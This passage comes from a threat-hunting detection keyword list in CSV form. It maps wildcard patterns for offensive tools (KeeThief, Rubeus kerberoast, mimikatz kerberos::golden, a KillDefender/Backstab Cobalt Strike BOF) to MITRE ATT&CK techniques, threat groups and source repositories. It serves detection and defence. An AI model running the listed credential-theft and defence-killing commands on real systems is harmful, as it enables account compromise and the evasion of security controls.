/PID*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /SERVICE*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /STRIP*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /UNLOAD*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab.cna*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KeeFarceReborn.*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*KeePass.sln*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential 
Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*keepass_common_plug.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keepass_discover.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*keepass2john *.kdbx*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*KeePassBackdoor.*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*KeePassConfig.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeePassConfig.ps1*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*-KeePassConfigTrigger*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*keepass-password-dumper*,offensive_tool_keyword,keepass-password-dumper,KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. 
just a memory dump,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/vdohney/keepass-password-dumper,1,1,N/A,N/A,6,567,47,2023-08-17T19:26:55Z,2023-05-01T17:08:55Z -*KeePwn plugin add -u * -p * -d * -t *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KeePwn plugin check -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KeeTheft/Dinvoke*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*KeeThief*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*KeeThief.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeeThief.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeeThiefSyscalls*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*keethief-syscalls*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*keodbianoliadkoelloecbhllnpiocoi*,greyware_tool_keyword,Hide My IP VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*kerberoast /*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*kerberoast /*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Kerberoast.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*kerberoast.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*Kerberoast.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*kerberoast_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoast_blind_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoast_john_results_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - 
TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoastables.txt*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*kerberoasting*,offensive_tool_keyword,OSCP-Cheatsheets,kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.,T1558 - T1208 - T1003 - T1110,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md,1,1,N/A,N/A,1,81,33,2019-09-09T22:07:47Z,2019-09-12T22:07:31Z -*kerberoasting.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*kerberos*.kirbi*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*kerberos/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*kerberos::ask*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::clist*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::golden*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::golden*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::hash*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
